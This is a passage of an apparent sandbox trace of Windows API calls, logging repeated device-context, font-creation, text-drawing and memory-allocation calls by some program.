(hdc=0x40106cc, color=0x0) returned 0x0 [0093.188] CreatePenIndirect (plpen=0x19f6fc) returned 0x193009a9 [0093.231] SelectObject (hdc=0x40106cc, h=0x193009a9) returned 0x1b00017 [0093.231] SetROP2 (hdc=0x40106cc, rop2=13) returned 13 [0093.231] CreateBrushIndirect (plbrush=0x19f700) returned 0x2d10099f [0093.231] UnrealizeObject (h=0x2d10099f) returned 1 [0093.231] SelectObject (hdc=0x40106cc, h=0x2d10099f) returned 0x1900010 [0093.231] SetBkColor (hdc=0x40106cc, color=0xffffff) returned 0xffffff [0093.231] SetBkMode (hdc=0x40106cc, mode=2) returned 2 [0093.231] DrawTextA (in: hdc=0x40106cc, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.270] SelectObject (hdc=0x40106cc, h=0x1b00017) returned 0x193009a9 [0093.277] SelectObject (hdc=0x40106cc, h=0x1900015) returned 0x2d10099f [0093.278] SelectObject (hdc=0x40106cc, h=0x18a0048) returned 0x280a099c [0093.278] GetCurrentPositionEx (in: hdc=0x40106cc, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.278] ReleaseDC (hWnd=0x0, hDC=0x40106cc) returned 1 [0093.278] GetDC (hWnd=0x0) returned 0xc0100ae [0093.278] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.279] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.279] GetSysColor (nIndex=8) returned 0x0 [0093.279] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.279] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.279] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.279] UnrealizeObject (h=0x2d10099f) returned 1 [0093.279] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.279] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.279] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.279] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.279] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.279] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.279] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.279] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.279] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.280] VirtualAlloc (lpAddress=0x2214000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2214000 [0093.281] GetDC (hWnd=0x0) returned 0xc0100ae [0093.281] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.281] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.281] GetSysColor (nIndex=8) returned 0x0 [0093.281] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.281] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.281] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.281] UnrealizeObject (h=0x2d10099f) returned 1 [0093.281] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.281] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.281] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.281] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.282] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.282] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.282] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.282] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.282] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.284] GetDC (hWnd=0x0) returned 0xc0100ae [0093.284] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.284] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.284] GetSysColor (nIndex=8) returned 0x0 [0093.284] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.284] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.284] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.284] UnrealizeObject (h=0x2d10099f) returned 1 [0093.284] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.285] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.285] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.285] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.285] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.285] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.285] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.285] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.285] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.286] GetDC (hWnd=0x0) returned 0xc0100ae [0093.286] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.286] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.286] GetSysColor (nIndex=8) returned 0x0 [0093.286] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.286] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.286] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.286] UnrealizeObject (h=0x2d10099f) returned 1 [0093.286] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.286] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.286] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.286] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.286] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.286] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.286] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.286] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.286] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.287] GetDC (hWnd=0x0) returned 0xc0100ae [0093.287] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.287] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.287] GetSysColor (nIndex=8) returned 0x0 [0093.287] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.288] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.288] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.288] UnrealizeObject (h=0x2d10099f) returned 1 [0093.288] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.288] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.288] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.288] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.288] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.288] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.288] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.288] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.288] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.289] GetDC (hWnd=0x0) returned 0xc0100ae [0093.289] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.289] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.289] GetSysColor (nIndex=8) returned 0x0 [0093.289] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.289] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.289] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.289] UnrealizeObject (h=0x2d10099f) returned 1 [0093.289] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.290] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.290] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.290] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.290] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.290] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.290] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.290] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.290] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.291] GetDC (hWnd=0x0) returned 0xc0100ae [0093.291] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.291] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.291] GetSysColor (nIndex=8) returned 0x0 [0093.291] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.291] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.291] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.291] UnrealizeObject (h=0x2d10099f) returned 1 [0093.291] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.291] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.291] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.291] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.292] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.292] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.292] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.292] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.292] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.292] GetDC (hWnd=0x0) returned 0xc0100ae [0093.293] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.293] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.296] GetSysColor (nIndex=8) returned 0x0 [0093.296] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.296] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.296] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.296] UnrealizeObject (h=0x2d10099f) returned 1 [0093.296] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.296] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.296] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.296] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.296] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.297] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.297] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.297] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.297] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.297] GetDC (hWnd=0x0) returned 0xc0100ae [0093.297] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.298] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.298] GetSysColor (nIndex=8) returned 0x0 [0093.298] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.298] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.298] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.298] UnrealizeObject (h=0x2d10099f) returned 1 [0093.298] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.298] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.298] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.298] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.298] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.298] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.298] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.298] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.299] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.300] GetDC (hWnd=0x0) returned 0xc0100ae [0093.303] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.303] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.303] GetSysColor (nIndex=8) returned 0x0 [0093.303] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.303] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.303] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.303] UnrealizeObject (h=0x2d10099f) returned 1 [0093.303] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.303] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.303] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.304] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.304] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.304] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.304] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.304] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.304] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.305] GetDC (hWnd=0x0) returned 0xc0100ae [0093.305] MoveToEx (in: hdc=0xc0100ae, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.305] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.305] GetSysColor (nIndex=8) returned 0x0 [0093.305] SetTextColor (hdc=0xc0100ae, color=0x0) returned 0x0 [0093.305] SelectObject (hdc=0xc0100ae, h=0x193009a9) returned 0x1b00017 [0093.305] SetROP2 (hdc=0xc0100ae, rop2=13) returned 13 [0093.305] UnrealizeObject (h=0x2d10099f) returned 1 [0093.305] SelectObject (hdc=0xc0100ae, h=0x2d10099f) returned 0x1900010 [0093.305] SetBkColor (hdc=0xc0100ae, color=0xffffff) returned 0xffffff [0093.305] SetBkMode (hdc=0xc0100ae, mode=2) returned 2 [0093.305] DrawTextA (in: hdc=0xc0100ae, lpchText=" ", cchText=1, lprc=0x19f76d, format=0x440 | out: lpchText=" ", lprc=0x19f76d) returned 13 [0093.305] SelectObject (hdc=0xc0100ae, h=0x1b00017) returned 0x193009a9 [0093.305] SelectObject (hdc=0xc0100ae, h=0x1900015) returned 0x2d10099f [0093.305] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.305] GetCurrentPositionEx (in: hdc=0xc0100ae, lppt=0x19f758 | out: lppt=0x19f758) returned 1 [0093.306] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.306] GetDC (hWnd=0x0) returned 0xc0100ae [0093.306] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa18 | out: lptm=0x19fa18) returned 1 [0093.306] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="Tahoma", cchCount1=6, lpString2="Default", cchCount2=7) returned 3 [0093.306] CreateFontIndirectA (lplf=0x19f9d0) returned 0x260a09ba [0093.307] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.307] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa50 | out: lptm=0x19fa50) returned 1 [0093.312] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.312] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.313] GetSystemMetrics (nIndex=6) returned 1 [0093.313] GetDC (hWnd=0x0) returned 0xc0100ae [0093.313] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa04 | out: lptm=0x19fa04) returned 1 [0093.313] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.313] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa3c | out: lptm=0x19fa3c) returned 1 [0093.313] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.313] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.313] GetSystemMetrics (nIndex=6) returned 1 [0093.314] GetDC (hWnd=0x0) returned 0xc0100ae [0093.314] GetDeviceCaps (hdc=0xc0100ae, index=90) returned 96 [0093.314] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.314] MulDiv (nNumber=-10, nNumerator=72, nDenominator=96) returned -8 [0093.314] GetDC (hWnd=0x0) returned 0xc0100ae [0093.314] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa04 | out: lptm=0x19fa04) returned 1 [0093.314] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.314] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa3c | out: lptm=0x19fa3c) returned 1 [0093.314] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.315] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.315] GetSystemMetrics (nIndex=6) returned 1 [0093.315] GetDC (hWnd=0x0) returned 0xc0100ae [0093.315] GetDeviceCaps (hdc=0xc0100ae, index=90) returned 96 [0093.315] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.316] MulDiv (nNumber=-10, nNumerator=72, nDenominator=96) returned -8 [0093.316] GetDC (hWnd=0x0) returned 0xc0100ae [0093.316] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.316] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.316] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.316] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.316] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.317] GetSystemMetrics (nIndex=6) returned 1 [0093.317] GetDC (hWnd=0x0) returned 0xc0100ae [0093.317] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.317] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.317] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.317] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.317] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.317] GetSystemMetrics (nIndex=6) returned 1 [0093.317] GetDC (hWnd=0x0) returned 0xc0100ae [0093.317] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.317] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.317] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.318] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.318] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.318] GetSystemMetrics (nIndex=6) returned 1 [0093.318] GetDC (hWnd=0x0) returned 0xc0100ae [0093.318] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.318] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.318] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.318] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.318] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.318] GetSystemMetrics (nIndex=6) returned 1 [0093.318] GetDC (hWnd=0x0) returned 0xc0100ae [0093.319] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.319] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.319] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.319] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.319] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.319] GetSystemMetrics (nIndex=6) returned 1 [0093.319] GetDC (hWnd=0x0) returned 0xc0100ae [0093.319] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.319] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.319] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.319] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.319] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.319] GetSystemMetrics (nIndex=6) returned 1 [0093.320] GetDC (hWnd=0x0) returned 0xc0100ae [0093.320] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f760 | out: lptm=0x19f760) returned 1 [0093.320] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3 [0093.320] CreateFontIndirectA (lplf=0x19f718) returned 0x710a0691 [0093.320] SelectObject (hdc=0xc0100ae, h=0x710a0691) returned 0x18a0048 [0093.320] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f798 | out: lptm=0x19f798) returned 1 [0093.320] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x710a0691 [0093.320] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.321] GetSystemMetrics (nIndex=6) returned 1 [0093.321] GetDC (hWnd=0x0) returned 0xc0100ae [0093.321] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.321] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.321] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.322] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.322] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.322] GetSystemMetrics (nIndex=6) returned 1 [0093.322] GetDC (hWnd=0x0) returned 0xc0100ae [0093.322] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.322] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.322] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.322] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.322] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.322] GetSystemMetrics (nIndex=6) returned 1 [0093.322] GetDC (hWnd=0x0) returned 0xc0100ae [0093.323] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.323] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.323] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.323] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.323] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.323] GetSystemMetrics (nIndex=6) returned 1 [0093.324] GetDC (hWnd=0x0) returned 0xc0100ae [0093.326] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.326] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.326] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.326] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.326] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.326] GetSystemMetrics (nIndex=6) returned 1 [0093.326] GetDC (hWnd=0x0) returned 0xc0100ae [0093.326] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f6d0 | out: lptm=0x19f6d0) returned 1 [0093.326] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.326] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f708 | out: lptm=0x19f708) returned 1 [0093.326] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.327] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.327] GetSystemMetrics (nIndex=6) returned 1 [0093.327] GetDC (hWnd=0x0) returned 0xc0100ae [0093.327] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f730 | out: lptm=0x19f730) returned 1 [0093.327] SelectObject (hdc=0xc0100ae, h=0x280a099c) returned 0x18a0048 [0093.327] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f768 | out: lptm=0x19f768) returned 1 [0093.327] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x280a099c [0093.327] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.327] GetSystemMetrics (nIndex=6) returned 1 [0093.328] GetDC (hWnd=0x0) returned 0xc0100ae [0093.328] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f760 | out: lptm=0x19f760) returned 1 [0093.328] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3 [0093.328] CreateFontIndirectA (lplf=0x19f718) returned 0x430a0638 [0093.328] SelectObject (hdc=0xc0100ae, h=0x430a0638) returned 0x18a0048 [0093.328] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19f798 | out: lptm=0x19f798) returned 1 [0093.328] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x430a0638 [0093.328] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.328] GetSystemMetrics (nIndex=6) returned 1 [0093.329] VirtualAlloc (lpAddress=0x2218000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2218000 [0093.330] GetDC (hWnd=0x0) returned 0xc0100ae [0093.330] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa2c | out: lptm=0x19fa2c) returned 1 [0093.330] SelectObject (hdc=0xc0100ae, h=0x260a09ba) returned 0x18a0048 [0093.330] GetTextMetricsA (in: hdc=0xc0100ae, lptm=0x19fa64 | out: lptm=0x19fa64) returned 1 [0093.330] SelectObject (hdc=0xc0100ae, h=0x18a0048) returned 0x260a09ba [0093.330] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0093.331] GetSystemMetrics (nIndex=6) returned 1 [0093.331] GetDC (hWnd=0x0) returned 0xc0100ae [0093.331] 